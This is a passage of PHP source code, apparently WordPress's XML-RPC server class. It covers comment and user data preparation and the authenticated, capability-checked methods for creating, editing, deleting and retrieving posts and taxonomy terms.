}
/**
* Prepares comment data for return in an XML-RPC object.
*
* @param WP_Comment $comment The unprepared comment data.
* @return array The prepared comment data.
*/
protected function _prepare_comment( $comment ) {
// Format page date.
$comment_date_gmt = $this->_convert_date_gmt( $comment->comment_date_gmt, $comment->comment_date );
if ( '0' === $comment->comment_approved ) {
$comment_status = 'hold';
} elseif ( 'spam' === $comment->comment_approved ) {
$comment_status = 'spam';
} elseif ( '1' === $comment->comment_approved ) {
$comment_status = 'approve';
} else {
$comment_status = $comment->comment_approved;
}
$_comment = array(
'date_created_gmt' => $comment_date_gmt,
'user_id' => $comment->user_id,
'comment_id' => $comment->comment_ID,
'parent' => $comment->comment_parent,
'status' => $comment_status,
'content' => $comment->comment_content,
'link' => get_comment_link( $comment ),
'post_id' => $comment->comment_post_ID,
'post_title' => get_the_title( $comment->comment_post_ID ),
'author' => $comment->comment_author,
'author_url' => $comment->comment_author_url,
'author_email' => $comment->comment_author_email,
'author_ip' => $comment->comment_author_IP,
'type' => $comment->comment_type,
);
/**
* Filters XML-RPC-prepared data for the given comment.
*
* @since 3.4.0
*
* @param array $_comment An array of prepared comment data.
* @param WP_Comment $comment Comment object.
*/
return apply_filters( 'xmlrpc_prepare_comment', $_comment, $comment );
}
/**
* Prepares user data for return in an XML-RPC object.
*
* @param WP_User $user The unprepared user object.
* @param array $fields The subset of user fields to return.
* @return array The prepared user data.
*/
protected function _prepare_user( $user, $fields ) {
$_user = array( 'user_id' => (string) $user->ID );
$user_fields = array(
'username' => $user->user_login,
'first_name' => $user->user_firstname,
'last_name' => $user->user_lastname,
'registered' => $this->_convert_date( $user->user_registered ),
'bio' => $user->user_description,
'email' => $user->user_email,
'nickname' => $user->nickname,
'nicename' => $user->user_nicename,
'url' => $user->user_url,
'display_name' => $user->display_name,
'roles' => $user->roles,
);
if ( in_array( 'all', $fields, true ) ) {
$_user = array_merge( $_user, $user_fields );
} else {
if ( in_array( 'basic', $fields, true ) ) {
$basic_fields = array( 'username', 'email', 'registered', 'display_name', 'nicename' );
$fields = array_merge( $fields, $basic_fields );
}
$requested_fields = array_intersect_key( $user_fields, array_flip( $fields ) );
$_user = array_merge( $_user, $requested_fields );
}
/**
* Filters XML-RPC-prepared data for the given user.
*
* @since 3.5.0
*
* @param array $_user An array of user data.
* @param WP_User $user User object.
* @param array $fields An array of user fields.
*/
return apply_filters( 'xmlrpc_prepare_user', $_user, $user, $fields );
}
/**
* Creates a new post for any registered post type.
*
* @since 3.4.0
*
* @link https://en.wikipedia.org/wiki/RSS_enclosure for information on RSS enclosures.
*
* @param array $args {
* Method arguments. Note: top-level arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 {
* Content struct for adding a new post. See wp_insert_post() for information on
* additional post fields
*
* @type string $post_type Post type. Default 'post'.
* @type string $post_status Post status. Default 'draft'
* @type string $post_title Post title.
* @type int $post_author Post author ID.
* @type string $post_excerpt Post excerpt.
* @type string $post_content Post content.
* @type string $post_date_gmt Post date in GMT.
* @type string $post_date Post date.
* @type string $post_password Post password (20-character limit).
* @type string $comment_status Post comment enabled status. Accepts 'open' or 'closed'.
* @type string $ping_status Post ping status. Accepts 'open' or 'closed'.
* @type bool $sticky Whether the post should be sticky. Automatically false if
* `$post_status` is 'private'.
* @type int $post_thumbnail ID of an image to use as the post thumbnail/featured image.
* @type array $custom_fields Array of meta key/value pairs to add to the post.
* @type array $terms Associative array with taxonomy names as keys and arrays
* of term IDs as values.
* @type array $terms_names Associative array with taxonomy names as keys and arrays
* of term names as values.
* @type array $enclosure {
* Array of feed enclosure data to add to post meta.
*
* @type string $url URL for the feed enclosure.
* @type int $length Size in bytes of the enclosure.
* @type string $type Mime-type for the enclosure.
* }
* }
* }
* @return int|IXR_Error Post ID on success, IXR_Error instance otherwise.
*/
public function wp_newPost( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$content_struct = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
// Convert the date field back to IXR form.
if ( isset( $content_struct['post_date'] ) && ! ( $content_struct['post_date'] instanceof IXR_Date ) ) {
$content_struct['post_date'] = $this->_convert_date( $content_struct['post_date'] );
}
/*
* Ignore the existing GMT date if it is empty or a non-GMT date was supplied in $content_struct,
* since _insert_post() will ignore the non-GMT date if the GMT date is set.
*/
if ( isset( $content_struct['post_date_gmt'] ) && ! ( $content_struct['post_date_gmt'] instanceof IXR_Date ) ) {
if ( '0000-00-00 00:00:00' === $content_struct['post_date_gmt'] || isset( $content_struct['post_date'] ) ) {
unset( $content_struct['post_date_gmt'] );
} else {
$content_struct['post_date_gmt'] = $this->_convert_date( $content_struct['post_date_gmt'] );
}
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.newPost', $args, $this );
unset( $content_struct['ID'] );
return $this->_insert_post( $user, $content_struct );
}
/**
* Helper method for filtering out elements from an array.
*
* @since 3.4.0
*
* @param int $count Number to compare to one.
* @return bool True if the number is greater than one, false otherwise.
*/
private function _is_greater_than_one( $count ) {
return $count > 1;
}
/**
* Encapsulates the logic for sticking a post and determining if
* the user has permission to do so.
*
* @since 4.3.0
*
* @param array $post_data
* @param bool $update
* @return void|IXR_Error
*/
private function _toggle_sticky( $post_data, $update = false ) {
$post_type = get_post_type_object( $post_data['post_type'] );
// Private and password-protected posts cannot be stickied.
if ( 'private' === $post_data['post_status'] || ! empty( $post_data['post_password'] ) ) {
// Error if the client tried to stick the post, otherwise, silently unstick.
if ( ! empty( $post_data['sticky'] ) ) {
return new IXR_Error( 401, __( 'Sorry, you cannot stick a private post.' ) );
}
if ( $update ) {
unstick_post( $post_data['ID'] );
}
} elseif ( isset( $post_data['sticky'] ) ) {
if ( ! current_user_can( $post_type->cap->edit_others_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to make posts sticky.' ) );
}
$sticky = wp_validate_boolean( $post_data['sticky'] );
if ( $sticky ) {
stick_post( $post_data['ID'] );
} else {
unstick_post( $post_data['ID'] );
}
}
}
/**
* Helper method for wp_newPost() and wp_editPost(), containing shared logic.
*
* @since 3.4.0
*
* @see wp_insert_post()
*
* @param WP_User $user The post author if post_author isn't set in $content_struct.
* @param array|IXR_Error $content_struct Post data to insert.
* @return IXR_Error|string
*/
protected function _insert_post( $user, $content_struct ) {
$defaults = array(
'post_status' => 'draft',
'post_type' => 'post',
'post_author' => 0,
'post_password' => '',
'post_excerpt' => '',
'post_content' => '',
'post_title' => '',
'post_date' => '',
'post_date_gmt' => '',
'post_format' => null,
'post_name' => null,
'post_thumbnail' => null,
'post_parent' => 0,
'ping_status' => '',
'comment_status' => '',
'custom_fields' => null,
'terms_names' => null,
'terms' => null,
'sticky' => null,
'enclosure' => null,
'ID' => null,
);
$post_data = wp_parse_args( array_intersect_key( $content_struct, $defaults ), $defaults );
$post_type = get_post_type_object( $post_data['post_type'] );
if ( ! $post_type ) {
return new IXR_Error( 403, __( 'Invalid post type.' ) );
}
$update = ! empty( $post_data['ID'] );
if ( $update ) {
if ( ! get_post( $post_data['ID'] ) ) {
return new IXR_Error( 401, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_data['ID'] ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
if ( get_post_type( $post_data['ID'] ) !== $post_data['post_type'] ) {
return new IXR_Error( 401, __( 'The post type may not be changed.' ) );
}
} else {
if ( ! current_user_can( $post_type->cap->create_posts ) || ! current_user_can( $post_type->cap->edit_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to post on this site.' ) );
}
}
switch ( $post_data['post_status'] ) {
case 'draft':
case 'pending':
break;
case 'private':
if ( ! current_user_can( $post_type->cap->publish_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create private posts in this post type.' ) );
}
break;
case 'publish':
case 'future':
if ( ! current_user_can( $post_type->cap->publish_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish posts in this post type.' ) );
}
break;
default:
if ( ! get_post_status_object( $post_data['post_status'] ) ) {
$post_data['post_status'] = 'draft';
}
break;
}
if ( ! empty( $post_data['post_password'] ) && ! current_user_can( $post_type->cap->publish_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create password protected posts in this post type.' ) );
}
$post_data['post_author'] = absint( $post_data['post_author'] );
if ( ! empty( $post_data['post_author'] ) && $post_data['post_author'] !== $user->ID ) {
if ( ! current_user_can( $post_type->cap->edit_others_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create posts as this user.' ) );
}
$author = get_userdata( $post_data['post_author'] );
if ( ! $author ) {
return new IXR_Error( 404, __( 'Invalid author ID.' ) );
}
} else {
$post_data['post_author'] = $user->ID;
}
if ( 'open' !== $post_data['comment_status'] && 'closed' !== $post_data['comment_status'] ) {
unset( $post_data['comment_status'] );
}
if ( 'open' !== $post_data['ping_status'] && 'closed' !== $post_data['ping_status'] ) {
unset( $post_data['ping_status'] );
}
// Do some timestamp voodoo.
if ( ! empty( $post_data['post_date_gmt'] ) ) {
// We know this is supposed to be GMT, so we're going to slap that Z on there by force.
$date_created = rtrim( $post_data['post_date_gmt']->getIso(), 'Z' ) . 'Z';
} elseif ( ! empty( $post_data['post_date'] ) ) {
$date_created = $post_data['post_date']->getIso();
}
// Default to not flagging the post date to be edited unless it's intentional.
$post_data['edit_date'] = false;
if ( ! empty( $date_created ) ) {
$post_data['post_date'] = iso8601_to_datetime( $date_created );
$post_data['post_date_gmt'] = iso8601_to_datetime( $date_created, 'gmt' );
// Flag the post date to be edited.
$post_data['edit_date'] = true;
}
if ( ! isset( $post_data['ID'] ) ) {
$post_data['ID'] = get_default_post_to_edit( $post_data['post_type'], true )->ID;
}
$post_id = $post_data['ID'];
if ( 'post' === $post_data['post_type'] ) {
$error = $this->_toggle_sticky( $post_data, $update );
if ( $error ) {
return $error;
}
}
if ( isset( $post_data['post_thumbnail'] ) ) {
// Empty value deletes, non-empty value adds/updates.
if ( ! $post_data['post_thumbnail'] ) {
delete_post_thumbnail( $post_id );
} elseif ( ! get_post( absint( $post_data['post_thumbnail'] ) ) ) {
return new IXR_Error( 404, __( 'Invalid attachment ID.' ) );
}
set_post_thumbnail( $post_id, $post_data['post_thumbnail'] );
unset( $content_struct['post_thumbnail'] );
}
if ( isset( $post_data['custom_fields'] ) ) {
$this->set_custom_fields( $post_id, $post_data['custom_fields'] );
}
if ( isset( $post_data['terms'] ) || isset( $post_data['terms_names'] ) ) {
$post_type_taxonomies = get_object_taxonomies( $post_data['post_type'], 'objects' );
// Accumulate term IDs from terms and terms_names.
$terms = array();
// First validate the terms specified by ID.
if ( isset( $post_data['terms'] ) && is_array( $post_data['terms'] ) ) {
$taxonomies = array_keys( $post_data['terms'] );
// Validating term IDs.
foreach ( $taxonomies as $taxonomy ) {
if ( ! array_key_exists( $taxonomy, $post_type_taxonomies ) ) {
return new IXR_Error( 401, __( 'Sorry, one of the given taxonomies is not supported by the post type.' ) );
}
if ( ! current_user_can( $post_type_taxonomies[ $taxonomy ]->cap->assign_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to assign a term to one of the given taxonomies.' ) );
}
$term_ids = $post_data['terms'][ $taxonomy ];
$terms[ $taxonomy ] = array();
foreach ( $term_ids as $term_id ) {
$term = get_term_by( 'id', $term_id, $taxonomy );
if ( ! $term ) {
return new IXR_Error( 403, __( 'Invalid term ID.' ) );
}
$terms[ $taxonomy ][] = (int) $term_id;
}
}
}
// Now validate terms specified by name.
if ( isset( $post_data['terms_names'] ) && is_array( $post_data['terms_names'] ) ) {
$taxonomies = array_keys( $post_data['terms_names'] );
foreach ( $taxonomies as $taxonomy ) {
if ( ! array_key_exists( $taxonomy, $post_type_taxonomies ) ) {
return new IXR_Error( 401, __( 'Sorry, one of the given taxonomies is not supported by the post type.' ) );
}
if ( ! current_user_can( $post_type_taxonomies[ $taxonomy ]->cap->assign_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to assign a term to one of the given taxonomies.' ) );
}
/*
* For hierarchical taxonomies, we can't assign a term when multiple terms
* in the hierarchy share the same name.
*/
$ambiguous_terms = array();
if ( is_taxonomy_hierarchical( $taxonomy ) ) {
$tax_term_names = get_terms(
array(
'taxonomy' => $taxonomy,
'fields' => 'names',
'hide_empty' => false,
)
);
// Count the number of terms with the same name.
$tax_term_names_count = array_count_values( $tax_term_names );
// Filter out non-ambiguous term names.
$ambiguous_tax_term_counts = array_filter( $tax_term_names_count, array( $this, '_is_greater_than_one' ) );
$ambiguous_terms = array_keys( $ambiguous_tax_term_counts );
}
$term_names = $post_data['terms_names'][ $taxonomy ];
foreach ( $term_names as $term_name ) {
if ( in_array( $term_name, $ambiguous_terms, true ) ) {
return new IXR_Error( 401, __( 'Ambiguous term name used in a hierarchical taxonomy. Please use term ID instead.' ) );
}
$term = get_term_by( 'name', $term_name, $taxonomy );
if ( ! $term ) {
// Term doesn't exist, so check that the user is allowed to create new terms.
if ( ! current_user_can( $post_type_taxonomies[ $taxonomy ]->cap->edit_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to add a term to one of the given taxonomies.' ) );
}
// Create the new term.
$term_info = wp_insert_term( $term_name, $taxonomy );
if ( is_wp_error( $term_info ) ) {
return new IXR_Error( 500, $term_info->get_error_message() );
}
$terms[ $taxonomy ][] = (int) $term_info['term_id'];
} else {
$terms[ $taxonomy ][] = (int) $term->term_id;
}
}
}
}
$post_data['tax_input'] = $terms;
unset( $post_data['terms'], $post_data['terms_names'] );
}
if ( isset( $post_data['post_format'] ) ) {
$format = set_post_format( $post_id, $post_data['post_format'] );
if ( is_wp_error( $format ) ) {
return new IXR_Error( 500, $format->get_error_message() );
}
unset( $post_data['post_format'] );
}
// Handle enclosures.
$enclosure = isset( $post_data['enclosure'] ) ? $post_data['enclosure'] : null;
$this->add_enclosure_if_new( $post_id, $enclosure );
$this->attach_uploads( $post_id, $post_data['post_content'] );
/**
* Filters post data array to be inserted via XML-RPC.
*
* @since 3.4.0
*
* @param array $post_data Parsed array of post data.
* @param array $content_struct Post data array.
*/
$post_data = apply_filters( 'xmlrpc_wp_insert_post_data', $post_data, $content_struct );
// Remove all null values to allow for using the insert/update post default values for those keys instead.
$post_data = array_filter(
$post_data,
static function ( $value ) {
return null !== $value;
}
);
$post_id = $update ? wp_update_post( $post_data, true ) : wp_insert_post( $post_data, true );
if ( is_wp_error( $post_id ) ) {
return new IXR_Error( 500, $post_id->get_error_message() );
}
if ( ! $post_id ) {
if ( $update ) {
return new IXR_Error( 401, __( 'Sorry, the post could not be updated.' ) );
} else {
return new IXR_Error( 401, __( 'Sorry, the post could not be created.' ) );
}
}
return (string) $post_id;
}
/**
* Edits a post for any registered post type.
*
* The $content_struct parameter only needs to contain fields that
* should be changed. All other fields will retain their existing values.
*
* @since 3.4.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Post ID.
* @type array $4 Extra content arguments.
* }
* @return true|IXR_Error True on success, IXR_Error on failure.
*/
public function wp_editPost( $args ) {
if ( ! $this->minimum_args( $args, 5 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_id = (int) $args[3];
$content_struct = $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.editPost', $args, $this );
$post = get_post( $post_id, ARRAY_A );
if ( empty( $post['ID'] ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( isset( $content_struct['if_not_modified_since'] ) ) {
// If the post has been modified since the date provided, return an error.
if ( mysql2date( 'U', $post['post_modified_gmt'] ) > $content_struct['if_not_modified_since']->getTimestamp() ) {
return new IXR_Error( 409, __( 'There is a revision of this post that is more recent.' ) );
}
}
// Convert the date field back to IXR form.
$post['post_date'] = $this->_convert_date( $post['post_date'] );
/*
* Ignore the existing GMT date if it is empty or a non-GMT date was supplied in $content_struct,
* since _insert_post() will ignore the non-GMT date if the GMT date is set.
*/
if ( '0000-00-00 00:00:00' === $post['post_date_gmt'] || isset( $content_struct['post_date'] ) ) {
unset( $post['post_date_gmt'] );
} else {
$post['post_date_gmt'] = $this->_convert_date( $post['post_date_gmt'] );
}
/*
* If the API client did not provide 'post_date', then we must not perpetuate the value that
* was stored in the database, or it will appear to be an intentional edit. Conveying it here
* as if it was coming from the API client will cause an otherwise zeroed out 'post_date_gmt'
* to get set with the value that was originally stored in the database when the draft was created.
*/
if ( ! isset( $content_struct['post_date'] ) ) {
unset( $post['post_date'] );
}
$this->escape( $post );
$merged_content_struct = array_merge( $post, $content_struct );
$retval = $this->_insert_post( $user, $merged_content_struct );
if ( $retval instanceof IXR_Error ) {
return $retval;
}
return true;
}
/**
* Deletes a post for any registered post type.
*
* @since 3.4.0
*
* @see wp_delete_post()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Post ID.
* }
* @return true|IXR_Error True on success, IXR_Error instance on failure.
*/
public function wp_deletePost( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.deletePost', $args, $this );
$post = get_post( $post_id, ARRAY_A );
if ( empty( $post['ID'] ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'delete_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to delete this post.' ) );
}
$result = wp_delete_post( $post_id );
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be deleted.' ) );
}
return true;
}
/**
* Retrieves a post.
*
* @since 3.4.0
*
* The optional $fields parameter specifies what fields will be included
* in the response array. This should be a list of field names. 'post_id' will
* always be included in the response regardless of the value of $fields.
*
* Instead of, or in addition to, individual field names, conceptual group
* names can be used to specify multiple fields. The available conceptual
* groups are 'post' (all basic fields), 'taxonomies', 'custom_fields',
* and 'enclosure'.
*
* @see get_post()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Post ID.
* @type array $4 Optional. The subset of post type fields to return.
* }
* @return array|IXR_Error Array contains (based on $fields parameter):
* - 'post_id'
* - 'post_title'
* - 'post_date'
* - 'post_date_gmt'
* - 'post_modified'
* - 'post_modified_gmt'
* - 'post_status'
* - 'post_type'
* - 'post_name'
* - 'post_author'
* - 'post_password'
* - 'post_excerpt'
* - 'post_content'
* - 'link'
* - 'comment_status'
* - 'ping_status'
* - 'sticky'
* - 'custom_fields'
* - 'terms'
* - 'categories'
* - 'tags'
* - 'enclosure'
*/
public function wp_getPost( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_id = (int) $args[3];
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/**
* Filters the default post query fields used by the given XML-RPC method.
*
* @since 3.4.0
*
* @param array $fields An array of post fields to retrieve. By default,
* contains 'post', 'terms', and 'custom_fields'.
* @param string $method Method name.
*/
$fields = apply_filters( 'xmlrpc_default_post_fields', array( 'post', 'terms', 'custom_fields' ), 'wp.getPost' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPost', $args, $this );
$post = get_post( $post_id, ARRAY_A );
if ( empty( $post['ID'] ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
return $this->_prepare_post( $post, $fields );
}
/**
* Retrieves posts.
*
* @since 3.4.0
*
* @see wp_get_recent_posts()
* @see wp_getPost() for more on `$fields`
* @see get_posts() for more on `$filter` values
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Modifies the query used to retrieve posts. Accepts 'post_type',
* 'post_status', 'number', 'offset', 'orderby', 's', and 'order'.
* Default empty array.
* @type array $4 Optional. The subset of post type fields to return in the response array.
* }
* @return array|IXR_Error Array containing a collection of posts.
*/
public function wp_getPosts( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$filter = isset( $args[3] ) ? $args[3] : array();
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
$fields = apply_filters( 'xmlrpc_default_post_fields', array( 'post', 'terms', 'custom_fields' ), 'wp.getPosts' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPosts', $args, $this );
$query = array();
if ( isset( $filter['post_type'] ) ) {
$post_type = get_post_type_object( $filter['post_type'] );
if ( ! ( (bool) $post_type ) ) {
return new IXR_Error( 403, __( 'Invalid post type.' ) );
}
} else {
$post_type = get_post_type_object( 'post' );
}
if ( ! current_user_can( $post_type->cap->edit_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts in this post type.' ) );
}
$query['post_type'] = $post_type->name;
if ( isset( $filter['post_status'] ) ) {
$query['post_status'] = $filter['post_status'];
}
if ( isset( $filter['number'] ) ) {
$query['numberposts'] = absint( $filter['number'] );
}
if ( isset( $filter['offset'] ) ) {
$query['offset'] = absint( $filter['offset'] );
}
if ( isset( $filter['orderby'] ) ) {
$query['orderby'] = $filter['orderby'];
if ( isset( $filter['order'] ) ) {
$query['order'] = $filter['order'];
}
}
if ( isset( $filter['s'] ) ) {
$query['s'] = $filter['s'];
}
$posts_list = wp_get_recent_posts( $query );
if ( ! $posts_list ) {
return array();
}
// Holds all the posts data.
$struct = array();
foreach ( $posts_list as $post ) {
if ( ! current_user_can( 'edit_post', $post['ID'] ) ) {
continue;
}
$struct[] = $this->_prepare_post( $post, $fields );
}
return $struct;
}
/**
* Creates a new term.
*
* @since 3.4.0
*
* @see wp_insert_term()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Content struct for adding a new term. The struct must contain
* the term 'name' and 'taxonomy'. Optional accepted values include
* 'parent', 'description', and 'slug'.
* }
* @return int|IXR_Error The term ID on success, or an IXR_Error object on failure.
*/
public function wp_newTerm( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$content_struct = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.newTerm', $args, $this );
if ( ! taxonomy_exists( $content_struct['taxonomy'] ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $content_struct['taxonomy'] );
if ( ! current_user_can( $taxonomy->cap->edit_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create terms in this taxonomy.' ) );
}
$taxonomy = (array) $taxonomy;
// Hold the data of the term.
$term_data = array();
$term_data['name'] = trim( $content_struct['name'] );
if ( empty( $term_data['name'] ) ) {
return new IXR_Error( 403, __( 'The term name cannot be empty.' ) );
}
if ( isset( $content_struct['parent'] ) ) {
if ( ! $taxonomy['hierarchical'] ) {
return new IXR_Error( 403, __( 'This taxonomy is not hierarchical.' ) );
}
$parent_term_id = (int) $content_struct['parent'];
$parent_term = get_term( $parent_term_id, $taxonomy['name'] );
if ( is_wp_error( $parent_term ) ) {
return new IXR_Error( 500, $parent_term->get_error_message() );
}
if ( ! $parent_term ) {
return new IXR_Error( 403, __( 'Parent term does not exist.' ) );
}
$term_data['parent'] = $content_struct['parent'];
}
if ( isset( $content_struct['description'] ) ) {
$term_data['description'] = $content_struct['description'];
}
if ( isset( $content_struct['slug'] ) ) {
$term_data['slug'] = $content_struct['slug'];
}
$term = wp_insert_term( $term_data['name'], $taxonomy['name'], $term_data );
if ( is_wp_error( $term ) ) {
return new IXR_Error( 500, $term->get_error_message() );
}
if ( ! $term ) {
return new IXR_Error( 500, __( 'Sorry, the term could not be created.' ) );
}
// Add term meta.
if ( isset( $content_struct['custom_fields'] ) ) {
$this->set_term_custom_fields( $term['term_id'], $content_struct['custom_fields'] );
}
return (string) $term['term_id'];
}
/**
* Edits a term.
*
* @since 3.4.0
*
* @see wp_update_term()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Term ID.
* @type array $4 Content struct for editing a term. The struct must contain the
* term 'taxonomy'. Optional accepted values include 'name', 'parent',
* 'description', and 'slug'.
* }
* @return true|IXR_Error True on success, IXR_Error instance on failure.
*/
public function wp_editTerm( $args ) {
if ( ! $this->minimum_args( $args, 5 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$term_id = (int) $args[3];
$content_struct = $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.editTerm', $args, $this );
if ( ! taxonomy_exists( $content_struct['taxonomy'] ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $content_struct['taxonomy'] );
$taxonomy = (array) $taxonomy;
// Hold the data of the term.
$term_data = array();
$term = get_term( $term_id, $content_struct['taxonomy'] );
if ( is_wp_error( $term ) ) {
return new IXR_Error( 500, $term->get_error_message() );
}
if ( ! $term ) {
return new IXR_Error( 404, __( 'Invalid term ID.' ) );
}
if ( ! current_user_can( 'edit_term', $term_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this term.' ) );
}
if ( isset( $content_struct['name'] ) ) {
$term_data['name'] = trim( $content_struct['name'] );
if ( empty( $term_data['name'] ) ) {
return new IXR_Error( 403, __( 'The term name cannot be empty.' ) );
}
}
if ( ! empty( $content_struct['parent'] ) ) {
if ( ! $taxonomy['hierarchical'] ) {
return new IXR_Error( 403, __( 'Cannot set parent term, taxonomy is not hierarchical.' ) );
}
$parent_term_id = (int) $content_struct['parent'];
$parent_term = get_term( $parent_term_id, $taxonomy['name'] );
if ( is_wp_error( $parent_term ) ) {
return new IXR_Error( 500, $parent_term->get_error_message() );
}
if ( ! $parent_term ) {
return new IXR_Error( 403, __( 'Parent term does not exist.' ) );
}
$term_data['parent'] = $content_struct['parent'];
}
if ( isset( $content_struct['description'] ) ) {
$term_data['description'] = $content_struct['description'];
}
if ( isset( $content_struct['slug'] ) ) {
$term_data['slug'] = $content_struct['slug'];
}
$term = wp_update_term( $term_id, $taxonomy['name'], $term_data );
if ( is_wp_error( $term ) ) {
return new IXR_Error( 500, $term->get_error_message() );
}
if ( ! $term ) {
return new IXR_Error( 500, __( 'Sorry, editing the term failed.' ) );
}
// Update term meta.
if ( isset( $content_struct['custom_fields'] ) ) {
$this->set_term_custom_fields( $term_id, $content_struct['custom_fields'] );
}
return true;
}
/**
* Deletes a term.
*
* @since 3.4.0
*
* @see wp_delete_term()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string $3 Taxonomy name.
* @type int $4 Term ID.
* }
* @return true|IXR_Error True on success, IXR_Error instance on failure.
*/
public function wp_deleteTerm( $args ) {
if ( ! $this->minimum_args( $args, 5 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$taxonomy = $args[3];
$term_id = (int) $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.deleteTerm', $args, $this );
if ( ! taxonomy_exists( $taxonomy ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $taxonomy );
$term = get_term( $term_id, $taxonomy->name );
if ( is_wp_error( $term ) ) {
return new IXR_Error( 500, $term->get_error_message() );
}
if ( ! $term ) {
return new IXR_Error( 404, __( 'Invalid term ID.' ) );
}
if ( ! current_user_can( 'delete_term', $term_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to delete this term.' ) );
}
$result = wp_delete_term( $term_id, $taxonomy->name );
if ( is_wp_error( $result ) ) {
return new IXR_Error( 500, $result->get_error_message() );
}
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, deleting the term failed.' ) );
}
return $result;
}
/**
* Retrieves a term.
*
* @since 3.4.0
*
* @see get_term()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string $3 Taxonomy name.
